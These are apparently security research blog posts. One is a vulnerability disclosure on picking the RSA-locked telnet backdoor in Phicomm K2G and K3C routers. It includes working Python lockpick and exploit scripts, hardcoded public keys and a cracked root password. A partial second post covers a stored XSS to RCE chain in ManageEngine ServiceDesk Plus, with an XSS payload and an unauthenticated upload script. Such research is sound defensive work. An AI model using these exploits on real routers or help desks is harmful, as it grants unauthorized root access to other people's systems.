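def pub_decrypt(ciphertext: bytes) -> bytes:
    return pow(int.from_bytes(ciphertext, "big"), E, N).to_bytes(0x80, "big")

def phony_ciphertext() -> bytes:
    # Find a blob whose raw "public decryption" begins with a printable byte.
    while True:
        blob = os.urandom(0x80)
        if 0x21 <= pub_decrypt(blob)[0] < 0x7f:
            return blob

payload = phony_ciphertext()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)

for attempt in range(1, 1001):
    try:
        sock.sendto(b"ABCDEF1234", (ROUTER, PORT))  # state 1 -> 2
        sock.recvfrom(1024)                         # 16-byte product-identifying hash
        sock.sendto(payload, (ROUTER, PORT))        # our phony "signature"
        sock.recvfrom(1024)                         # pubkey-encrypted random secret (ignored)
        sock.sendto(TEMP_PASSWORD, (ROUTER, PORT))  # guess the ephemeral password
        with socket.create_connection((ROUTER, 23), timeout=1):
            print(f"telnet open after {attempt} attempts")
            break
    except OSError:
        time.sleep(0.1)  # wrong guess or timeout; the secret is re-rolled next round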

Protocol Diagram Showing How the Backdoor Lock can be Picked

Proof of concept

To bring these findings together, I wrote a small proof-of-concept program in C that will reliably pick the lock on the Phicomm router’s backdoor and grant the user a root shell over telnet. You can see it in action below.

A screencast showing our exploit in action, successfully picking the lock on the Phicomm K2G router’s backdoor.

Picking the Lock on the K3C’s Backdoor

An advertisement for the Phicomm K3C, which sports an essentially identical backdoor.

I was curious whether Phicomm’s flagship router, the K3C, might implement the same backdoor protocol, and, if so, whether it might be vulnerable to an identical attack. These devices are still available through Phicomm’s Amazon storefront, for less than $30. So I put in an order for the device, and while I waited, set about scouring a few Chinese forums for surviving copies of the K3C’s firmware image. I was in luck! I was able to obtain firmware images for the K3C, in each of the following versions:

  • 32.1.15.93
  • 32.1.22.113
  • 32.1.26.175
  • 32.1.45.267
  • 32.1.46.268
$ find . -path "*usr/bin/telnetd_startup" -exec bash -c 'echo -e "$(grep -o "fw_ver .*" $(dirname {})/../../etc/config/system)\n\tMD5 HASH OF BINARY: $(md5sum {})\n\tPRODUCT IDENTIFIER: $(strings {} | grep VER)\n\tPUBLIC RSA KEY(S): $(strings -n 256 {})\n"' {} \;
fw_ver '32.1.15.93'
MD5 HASH OF BINARY: f53a60b140009d91b51e4f24e483e893 ./_K3C_V32.1.15.93.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
9FC8FFBF53AECF8461DEFB98D81486A5D2DEE341F377BA16FB1218FBAE23BB1F3766732F8D382E15543FC2980208D968E7AE1AC4B48F53719F6D9964E583A0B791150B9C0C354143AE285567D8C042240CA8D7A6446E49CCAF575ACC63C55BAC8CF5B6A77DEE0580E50C2BFEB62C06ACA49E0FD0831D1BB0CB72BC9B565313C9
fw_ver '32.1.22.113'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.22.113.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.26.175'
MD5 HASH OF BINARY: d23c3c27268e2d16c721f792f8226b1d ./_K3C_V32.1.26.175.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER:
PUBLIC RSA KEY(S): CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519
fw_ver '32.1.45.267'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_SW_K3C_703004761_V32.1.45.267.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03
fw_ver '32.1.46.268'
MD5 HASH OF BINARY: 283b65244c4eafe8252cb3b43780a847 ./_K3C_V32.1.46.268.bin.extracted/squashfs-root/usr/bin/telnetd_startup
PRODUCT IDENTIFIER: K3C_INTELALL_VER_3.0
PUBLIC RSA KEY(S): E7FFD1A1BB9834966763D1175CFBF1BA2DF53A004B62977E5B985DFFD6D43785E5BCA088A6417BAF070BCE199B043C24B03BCEB970D7E47EEBA7F59D2BE4764DD8F06DB8E0E2945C912F52CB31C56C8349B689198C4A0D88FD029CCECDDFF9C1491FFB7893C11FAD69987DBA15FF11C7F1D570963FA3825B6AE92815388B3E03

The older versions appeared to work differently, and in one of the writeups I dug up on Baidu, I found instructions for using a tool that sounded, at first, very much like mine in order to gain a root shell over telnet, so as to upgrade the firmware to the most recent version — something no longer facilitated by the official Phicomm firmware repository, which shut its doors when the company collapsed at the beginning of 2019.

A screenshot of Jack Cruise’s post (passed through Google Translate), showing how the RoutAckProV1B2.exe tool can be used to crack the backdoor implemented in an obsolescent version of the K3C firmware. This tool, unlike ours, cannot crack the backdoor protocol used on the most recent versions of Phicomm firmware for the K2G and K3C routers.

A quick look at RoutAckProV1B2.exe suggested that it did, indeed, interact with whatever runs on UDP port 21210 (0x52da in hexadecimal, da 52 in little-endian representation).

A hex dump of RoutAckProV1B2.exe, which hints that this tool, too, interacts with a service that listens on UDP port 21210 on the router.

For a moment, I wondered if I’d been scooped, and spun up a Windows VM on the isolated network to which the Phicomm K2G was connected. I downloaded the RoutAckProV1B2 tool and monitored it with procmon.exe and Wireshark as it tried in vain to open the backdoor on the K2G. This tool wasn’t sending the handshake token, "ABCDEF1234".

A screenshot of the RoutAckProV1B2.exe tool running in a Windows VM, while being inspected by the Windows process monitor.

Instead it was sending a single 128-byte payload, five times in succession, before finally giving up.

This is the “magic packet” that the RoutAckProV1B2.exe tool uses to unlock the backdoor installed on older versions of Phicomm router firmware.
A closeup of the RoutAckProV1B2.exe tool, courtesy of Jack Cruise. The website www.right.com.cn is a Chinese-language forum for sharing technical information on a variety of routers.
Here we see the RoutAckProV1B2.exe tool unsuccessfully attempting to open the backdoor on a virtual machine running the most recent firmware I could find for the Phicomm K3C.

Firmware versions 32.1.45 and up, however, shared an identical build of the telnetd_startup daemon, which appeared to differ from its counterpart on the K2G router only in having been compiled for a big-endian MIPS instruction set rather than the K2G’s little-endian architecture. Surprisingly, this binary hadn’t been stripped of symbols, which made life just a little bit easier.

The function that set the ephemeral passwords (see above) suffered from the same programming mistake as its K2G counterpart, and was almost certainly built from the same source code.

A decompilation of the function I referred to above as “set_telnet_enable_keys()”, here seen in K3C’s build of the telnetd_startup binary. Here it’s compiled to a big-endian rather than little-endian MIPS architecture, and, unlike the K2G binary, has not been stripped of debugging symbols, which makes reverse engineering the binary somewhat easier. The algorithm is, nevertheless, identical.

All I needed to do, then, was recover the hardcoded public RSA key from the binary, and I could easily adapt my tool to pick the lock on this backdoor as well. Running strings -n 256 on the binary was all that it took.

Using strings -n 256 to grab the hardcoded public RSA key from the telnetd_startup binary in the K3C firmware (version 32.1.46.268).

strings also helped extract the product identifier. Where the Phicomm K2G build contained K2_COSTDOWN__VER_3.0, the K3C build had K3C_INTELALL_VER_3.0:

I used strings to grab the hardcoded product identifier from that binary, too.

I added this information to the table in the backdoor-lockpick tool, which associated product identifying strings with public RSA keys.

Adding the product identifier and hardcoded public RSA key to a lookup table used by my “backdoor lockpick” tool, enabling it to pick the lock on the K3C backdoor as well as the K2G one.
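
The table itself is nothing fancy. A sketch of the idea (the lookup keys are MD5s of the zero-padded product strings, computed the same way the daemon computes them; the moduli are truncated here, but the full values appear elsewhere in this post):

import hashlib

def product_digest(product_string: bytes) -> str:
    return hashlib.md5(product_string.ljust(0x80, b"\x00")).hexdigest()

# product-identifying hash -> (product string, hardcoded public RSA modulus)
BACKDOOR_KEYS = {
    product_digest(b"K2_COSTDOWN__VER_3.0"): (
        "K2_COSTDOWN__VER_3.0",
        "E541A631680C453DF31591A6E29382BC...9E9F858691",  # K2G A1 22.6.3.20
    ),
    product_digest(b"K3C_INTELALL_VER_3.0"): (
        "K3C_INTELALL_VER_3.0",
        "E7FFD1A1BB9834966763D1175CFBF1BA...15388B3E03",  # K3C 32.1.45+
    ),
}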

With a week to wait before my K3C arrived, I decided I’d make do with the tools at my disposal and emulate the K3C build of telnetd_startup in user mode with QEMU (wrapped, for the sake of portability and convenience, in a Docker container, following the method @drablyechos describes in their 2020 IoT Village talk at DEFCON, though the Docker wrapper isn’t strictly necessary).

The telnetd_startup daemon fails its preliminary search for the telnet flag in flash storage, since there’s no flash storage device to check, but it recovers from this failure gracefully and goes on to listen on UDP port 21210, just as it would if the telnet flag had been set to the disabled position in the flash device (which is, after all, the default setting).

The lockpick has no more trouble with this backdoor than it did with the one on the K2G.

A screencast showing my backdoor lockpick in action, again, this time picking the lock on the K3C’s backdoor. The K3C firmware, in this case, is being run on a virtual machine. The hardware was still in the mail.

For the sake of thoroughness, I decided to test RoutAckProV1B2.exe’s attack against my virtualized K3C, running firmware version 32.1.46.268.

Relying on Google Translate to read on-screen Chinese sometimes presents a challenge.

Google translate doing its best to help me read the log messages on RoutAckProV1B2.exe’s GUI.

Not entirely sure of what was happening here, I decided I’d better check Wireshark again. RoutAckProV1B2 was repeatedly sending 128-byte packets to my virtualized K3C server (running firmware version 32.1.46.268) on UDP port 21210, but receiving no replies. At no point did a telnet port open.

When tested against the older firmware version 32.1.26.175, however, RoutAckProV1B2.exe worked like a charm.

This seems to establish beyond any doubt that the most recent firmware versions for Phicomm’s K2G and K3C routers are using a new backdoor protocol, designed with better security but implemented with a catastrophic loophole, which permits anyone on the LAN to gain a root shell on either device.

The Phicomm K3C with International Firmware Version 33.1.25.177

Still unsure whether I’d tested the most recent versions of the Phicomm K3C firmware, or whether I’d find the same backdoor in the devices they’d built for the international market, I was eager to get my hands on a brand new K3C device. It arrived just as I was wrapping up with my K3C emulations.

I set up the router and found that the firmware running on this device bore the version 33.1.25.177, a major version bump ahead of the latest Chinese market firmware I’d tested.

The web admin interface for the international release of the K3C, running firmware version 33.1.25.177.

There was something listening on UDP port 21210, but it didn’t, at first, appear to behave like the backdoor I’d found on the Chinese market firmware I’d studied. Rather than listening silently until it received the magic handshake, ABCDEF1234, it would respond to any packet with an unpredictable, high-entropy packet containing exactly 128 bytes. I suspected this might be something like the encrypted secret that the backdoor would send to its client in Stage 2 of the protocol discussed above.
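
A quick probe is enough to see the difference in behaviour. Anything at all elicits the 128-byte reply (the payload below is arbitrary):

import socket

K3C = "192.168.2.1"  # substitute the router's LAN address

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
sock.sendto(b"hello?", (K3C, 21210))  # not the magic handshake, just junk
reply, _ = sock.recvfrom(1024)
print(len(reply), reply.hex())        # 128 high-entropy bytes, every time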

The behaviour was reminiscent of the simpler backdoor that the tool RoutAckProV1B2.exe seemed designed for, but I wasn’t able to get anywhere with that particular tool.

I figured I could make better sense of things if I could just look at the binary of whatever it was that listened on UDP port 21210 on this device, so I set to work taking it apart, in search of a UART port by which I might obtain a root shell.

I was in luck! The device not only sports a UART, but a clearly-labelled UART at that!

A clearly labelled UART at that!

So I grabbed my handy-dandy UART-to-USB serial bridge…

My handy-dandy UART-to-USB bridge.

…and set about soldering some header pins to the UART port. These devices are somewhat delicate machines, so I first tried to get as far as I could without disassembling everything and removing it from the casing. A hot air gun was helpful here.

And there we go:

UART pins ready!

The molten plastic casing was still a bit awkward to work around, however, so I did eventually end up taking things apart, and removing the unneeded upper board, which housed the RF components. Everything still worked fine.

With the UART adapter connected, I was able to obtain a serial connection using minicom, at 115200 Baud 8N1. This gave me access to a U-Boot BIOS shell after interrupting the boot process, with direct read and write access to the 1Gb F-die NAND flash storage chip (a Samsung 734 K9F1G08U0F SCB0), on which both the firmware and the bootloader are stored.

The Samsung 734 K9F1G08U0F SCB0.

If we let the boot process run its course, we’re presented with a Linux login prompt. We could try to guess the password here, or take the more difficult, principled approach of first dumping the NAND and searching it for clues. Let’s do things the hard way. I adapted Valerio’s Tcl expect script to hexdump the entire NAND volume, and left it running overnight.

Valerio’s U-Boot flash dumping script, adapted to work on the K3C.

I deserialized the hex back to binary with a bit of Python, and then went at it with the usual tools. The most rewarding turned out to be strings:

Digging some password hashes out of the NAND volume.

Hashcat didn’t have any trouble with this, and gave me one of the root passwords in seconds:

Returning to the login prompt while hashcat warmed up my office, I logged in with username root, password admin, and presto!

The firmware conveniently had netcat installed, and our old friend telnetd_startup was sitting right there in /usr/bin. I piped it over to my workstation, and dropped it into Ghidra.

The protocol implemented by the version of telnetd_startup in the latest international market firmware for the K3C closely resembles what we see in the Chinese market K2G 22.6.3.20 and the K3C 32.1.46.268. It differs only in omitting the initial stage. Rather than waiting for the ABCDEF1234 handshake, and then responding with a device identifying hash, it expects the initial packet to contain a message encrypted with the private RSA key that matches its hardcoded public key. It “decrypts” this message with the public key, XORs it with a randomly generated 31-character secret, and then, fatally, concatenates it with either +TEMP or +PERM using sprintf(), before hashing the result with MD5, to produce the ephemeral passwords for temporarily and permanently activating the telnet service respectively.

This all looks very familiar.
A familiar-looking xor() function in the international firmware for the K3C.
And here’s where they make their fatal mistake.

This algorithm is vulnerable to the same attack that worked against the three-stage backdoor protocol implemented in the telnetd_startup versions we’ve already looked at. All we need to do is grab the hardcoded public key and tweak our lockpick tool so that it skips the handshake/identifier stage when communicating with this particular release.

That public key, by the way, is

CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519

Remember that one.

I made the necessary adjustments to the tool, and it worked, again, like a charm!

An Exposed Private RSA Key in the K2 Router, with Firmware Version 22.5.9.163, but One that You Don’t Even Need

I mentioned before that another solution to this puzzle would simply be to obtain the private RSA key that matched the hardcoded public key. In the case of the K2G (the one in Wavlink’s clothing) I made some effort to search for the public key online, after converting it to various ASCII formats, just in case the pair had been left lying around somewhere. It was a long shot and didn’t pan out. But while I was exploring one of the older firmware images for Phicomm’s K2 line of routers — 22.5.9.163, dating from 2017 — I noticed something interesting:

Look familiar?

It’s using the same public key we saw in the brand new international release of the Phicomm K3C. But there’s more:

That shouldn’t be there!

In firmware version 22.5.9.163 for the K2 router, Phicomm exposed the private RSA key corresponding to the hardcoded public key that they continued to deploy in their international release long after correcting the error in their domestic market firmware versions. This error didn’t go unnoticed — this key pair shows up in a strings dump of RoutAckProV1B2.exe, which attacks an earlier, simpler backdoor protocol than either of the two protocols analysed here.

The method for constructing the ephemeral passwords in the K2 22.5.9.163 differs from what we’ve seen in these later firmware versions. Instead of generating a random secret and XORing it with public-key-decrypted data received from the client prior to concatenating it with the two magic salts, this earlier release simply concatenates the client’s decrypted secret with the salts. Everything is then hashed with MD5, just as it was before, and the two passwords are set.

The md5_command() function from the telnetd_startup binary in the K2 22.5.9.163 firmware.

Curiously, this release contains what must be a typo: instead of +PERM we have +PERP.

Now, leaked d parameter notwithstanding, it’s possible to crack open this backdoor without even using the private key. All that needs to be done is:

  1. Generate some ${phony_ciphertext} that the known public key will "decrypt" into a non-null buffer (call this the ${phony_plaintext}). It simplifies things if you also require that the phony plaintext contain no null bytes. Such a buffer can be found pretty quickly through brute trial and error.
  2. Take the MD5 hash of the string ${phony_plaintext}+TEMP. Let’s call that the ${temp_password}.
  3. Send ${phony_ciphertext} to UDP port 21210 on the router.
  4. And then, quickly afterwards, send ${temp_password} to the same port.

This will open the telnet service on the K2 22.5.9.163. For a telnet service that persists after rebooting, do the same as above but substitute PERP for TEMP (this misspelling seems to be peculiar to this particular version).
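
For what it’s worth, here is a sketch of those four steps in Python, using the modulus shown above. It assumes the daemon’s MD5 matches the standard algorithm, that the whole no-null plaintext is what gets salted and hashed, and that no particular timing is needed between the two packets:

import hashlib
import os
import socket

E = 0x10001
# The K2 22.5.9.163 hardcodes the same public key as the international K3C (see above).
N = int("CC232B9BB06C49EA1BDD0DE1EF9926872B3B16694AC677C8C581E1B4F59128912CBB92EB363990FAE43569778B58FA170FB1EBF3D1E88B7F6BA3DC47E59CF5F3C3064F62E504A12C5240FB85BE727316C10EFF23CB2DCE973376D0CB6158C72F6529A9012786000D820443CA44F9F445ED4ED0344AC2B1F6CC124D9ED309A519", 16)
ROUTER = "192.168.2.1"  # substitute the router's LAN address

# Step 1: phony ciphertext whose raw "decryption" contains no null bytes.
while True:
    phony_ciphertext = os.urandom(0x80)
    phony_plaintext = pow(int.from_bytes(phony_ciphertext, "big"), E, N).to_bytes(0x80, "big")
    if b"\x00" not in phony_plaintext:
        break

# Step 2: the temporary-enable password is MD5(${phony_plaintext}+TEMP).
temp_password = hashlib.md5(phony_plaintext + b"+TEMP").digest()

# Steps 3 and 4: send the ciphertext, then the password, to UDP port 21210.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(phony_ciphertext, (ROUTER, 21210))
sock.sendto(temp_password, (ROUTER, 21210))
# telnetd should now be listening on TCP 23; use "+PERP" instead of "+TEMP" to persist across reboots.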

A Reconstructed History of Phicomm’s Backdoor Protocols

In the course of researching this vulnerability, I’ve looked closely at eleven different firmware images. Arranged in order of build date, they are:

So, to sum things up, the history of the Phicomm backdoor looks like this:

The oldest generation I’ve found of Phicomm’s telnetd_startup protocol (shaded blue, in the tables above) is relatively simple: the server waits to receive an encrypted message, which it decrypts and hashes with two different salts. It then waits for another message, and if that message matches either of those hashes, it will either spawn the telnet service or write a flag to the flash drive to trigger the spawning of telnet on boot. This is the protocol we see in the K2 22.5.9.163, released in early 2017. That particular build made the blunder of hardcoding the private key in the binary, which defeats the purpose of asymmetric encryption. This error enabled the creation of RoutAckProV1B2.exe, a router-hacking tool which has been circulating online for several years, which uses the pilfered private key to allow any interested party to gain root access to this iteration of the backdoor. Of course, as we just saw, use of the private key isn’t even necessary to open the door. What the design overlooks — and this oversight will never be truly corrected — is that it’s not only possible but easy to generate phony ciphertext that a public RSA key will “decrypt” into predictable, phony plaintext. Doing so will permit an attacker to subvert the locking mechanism on the backdoor, and gain unauthorized entry.

Phicomm responded to this situation in an entirely insufficient fashion in the next generation of the protocol (shaded yellow, above), which we find in the firmware versions released later in 2017, including the still-for-sale international release of the K3C (analysed above). They redacted the private key from the binary, but failed to change the public key. Their next design, moreover, appears to share the assumption that it’s only by encrypting data with the private key that an attacker can predict or control the output of its public key decryption. Rather than addressing either of these errors, they just piled on further complexity: this is when they began to generate a 31-character random secret and XOR it with the public-key-decrypted data received from the client in order to generate their ephemeral passwords. This makes the backdoor slightly harder to attack, if we continue to ignore the leaked private key, but it’s ultimately just a matter of discovering some phony ciphertext that decrypts to a plaintext that begins with a printable ASCII character. This gives us a 1 in 94 chance of colliding with the first byte of the random secret, which, due to the careless use of sprintf’s %s specifier for byte-array concatenation, will result in a completely predictable ephemeral password.

The next generation (mauve in the tables above) is the last I looked at, and likely the last released. Phicomm finally removed the compromised public key, and took the additional precaution of deploying a distinct public key to each router model. They also added a device-identifying handshake phase to the protocol, which makes the backdoor considerably stealthier — there’s no real way to tell that it’s listening on UDP port 21210, unless you send it the magic token ABCDEF1234. It responds to this magic token with a device-identifying hash, permitting the client to select the private key that matches the public key compiled into the service. The algorithm itself, however, shares the same security flaws as its predecessor, and is vulnerable to an essentially identical attack. This is the iteration we see in the Chinese market release of the K3C, 32.1.46.268, and in the Chinese market K2G A1 22.6.3.20 — the firmware image that ended up on certain Wavlink-branded routers that Wavlink neglected to flash with firmware of their own.

I’d love to conduct a more exhaustive test of various Phicomm firmware images, but they’re becoming rather difficult to find online. If you know where I might find a copy of a firmware version not mentioned here, please reach out to us at bughunters at tenable dot com.

Will these Vulnerabilities Ever Be Patched?

No.

These vulnerabilities will never be patched. Certainly not through official channels.

The Phicomm corporation is dead and gone.

After various attempts to contact Phicomm’s customer support offices in China, Germany, and California, and even reaching out to the CEO directly, I received this reply on October 10 from what remained of Phicomm’s German office.

Dear Sir,
Thank you for contacting Phicomm Support in Germany. Phicomm has closed all Business worldwide since 01.01.2019.
Yours sincerely
Service Team Phicomm

I’m not sure whether or not the @PHICOMM account on Telegram is managed by the company, but if it is, things didn’t look good on that end, either.

Poor guy.

So, what exactly happened to Phicomm?

In 2015, while at the height of their economic power — with a net operating income of close to 10 billion yuan (a little over 1.5 billion USD), earning them comparisons to Huawei in the press — Phicomm, under the leadership of CEO and founder Gu Guoping, entered into a highly questionable business arrangement with the P2P lending company LianBi Financial. Former Project Director for Phicomm, James Soh, has posted on LinkedIn about

the sudden appearance in June 2015 of a person-to-person (P2P) financial service company called LianBi Finance that started month-long on-site promotion on company grounds. They claimed that LianBi Finance is a partner firm and there is proper agreement in place for collaboration between Shanghai Phicomm and LianBi Finance but it was never publicized. They promote financial products that has unrealistic returns. Thereafter, the tie-up between Shanghai Phicomm and LianBi Finance went further where Shanghai Phicomm home Wifi kit costing 399 RMB and up, shall be refunded by LianBi Finance for the full amount if the buyer scanned the QR code on the Wifi product box and provided personal details. People will buy more and more sets, however discovered that they cannot get the full amount back from the second set of kit they bought, instead they are offered to purchase a certain amount of financial investment products of say 5,000 RMB, and returns of 12% per month will be credited back into the buyer. This is a pyramid scheme in disguise. In addition, Mr Gu tied staff promotion and bonus in Shanghai Phicomm to how much LianBi products each person buy.
Gu Guoping, in better days than these.

Peer-to-peer (P2P) lending is a high-risk financial instrument that often offers investors — that is, lenders — astonishingly high rates of return, and which has been criticized for being a Ponzi scheme with extra steps. It would eventually become known that Gu “effectively also owned and controlled LianBi.” 2016 saw the beginnings of the Chinese government’s crackdown on P2P lending platforms, in a campaign that would reach its summit in 2018. A case was filed against LianBi Financial that year, under suspicion of “illegally absorbing public deposits.” In 2021, the police raided LianBi’s offices and arrested Gu Guoping.

Police raiding the LianBi Financial headquarters.

A public hearing was held against Gu on February 4 of that year, and on December 8, 2021,

Gu Guoping was sentenced to life imprisonment for the crime of fundraising fraud, deprived of political rights for life, and confiscated all personal property. Nong Jin, Chen Yu, Zhu Jun, Wang Jingjing, and Zhang Jimin were sentenced to fixed-term imprisonment ranging from 15 to 10 years for the crime of fund-raising fraud, as well as confiscation of personal property of RMB 5 million to 600,000.
Gu Guoping, together with a few of his associates, at a public hearing in the Shanghai №1 Intermediate People’s Court, on February 4, 2021. The yellow sign says “defendant”.

And this, in a nutshell, is why we can expect no patches from Phicomm for the vulnerabilities discussed in this post.

So, what about Wavlink?

This part of the story is still a little unclear, but it seems to me that what happened was this: sometime between May, 2018, when they released their last batch of routers, and January 2019, when they closed down business worldwide, Phicomm liquidated their remaining stock of routers, selling the surplus K2Gs to the Winstars corporation. Winstars then outfitted these devices with the branding of their subsidiary, Wavlink, and distributed them through Amazon, which is how a Phicomm router in Wavlink clothing eventually arrived on my desk.

After hitting a wall with Phicomm, I reached out to Wavlink to report these vulnerabilities I’d found on what was, in a sense, their hardware. I imagined that they’d be interested to hear that they had been shipping out devices with Phicomm’s firmware. They replied that they had “released related patches last year or the beginning of this year,” but gave no indication as to how the customer might be able to upgrade to those patches if they were among those whose Wavlink-branded routers were running Phicomm firmware.

If removing the backdoor is your chief concern, then it’s far from given that re-flashing your router with Wavlink firmware would put you on any firmer ground. Wavlink, in fact, has its own history of installing backdoors. And shoddy or not, at least Phicomm made an effort to lock their backdoors. If you’re interested in reading more about Wavlink’s own backdoors, I recommend you read James Clee’s excellent writeup.

What Should I Do With my Phicomm Router?

There no longer exists an official avenue to update the firmware on any Phicomm router. The company collapsed entirely well before we discovered these zero days.

An intrepid user can, however, at their own risk, leverage one or more of the vulnerabilities documented above to re-flash their router with an open-source firmware like OpenWRT, which now supports several Phicomm models. There’s considerable risk of bricking your device in the process, and it isn’t for the faint of heart, but it’s quite probably the surest way to rid your router of the vulnerabilities analysed here.

Other creative solutions, available to the adventurous, might include using the backdoor to modify the firmware by hand — by disabling the telnetd_startup daemon, say. The user might also attempt to simply restrict access to UDP port 21210 by means of a firewall rule.

Remote management should be disabled immediately, if nothing else.

Disclosure Timeline

  • Tuesday, October 5, 2021: Phicomm customer support contacted to report vulnerabilities
  • Sunday, October 10, 2021: Phicomm’s German office replies to inform us that Phicomm “has closed all business worldwide since 01.01.2019.”
  • Thursday, October 7, 2021: Wavlink notified that several of their “AC1200” routers have shipped with vulnerable Phicomm firmware
  • Friday, October 8, 2021: Wavlink responds to request further details
  • Friday, October 29, 2021: Wavlink provided with requested details
  • Monday, December 6, 2021: Reminder sent to Wavlink after receiving no response


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

17 August 2021 at 13:02

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For the server-side bugs, stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found in our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>
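
Delivering the asset is just an unauthenticated HTTP POST to the servlet path named above. The sketch below uses Python’s requests library; the host, port, content type, and filename are placeholders, and any additional query parameters the servlet might expect are not modeled here.

import requests

TARGET = "http://servicedesk.example.com:8080"      # hypothetical SDP instance
ENDPOINT = "/discoveryServlet/WsDiscoveryServlet"    # unauthenticated asset-upload servlet

def upload_asset(xml_path):
    # Read the crafted asset definition (e.g. the Mac asset above with the injected "inet" line)
    with open(xml_path, "rb") as f:
        xml_body = f.read()
    # No session cookie or token is required: the servlet accepts anonymous POSTs
    resp = requests.post(TARGET + ENDPOINT, data=xml_body,
                         headers={"Content-Type": "text/xml"}, timeout=10)
    return resp.status_code

if __name__ == "__main__":
    print(upload_asset("malicious_asset.xml"))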

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

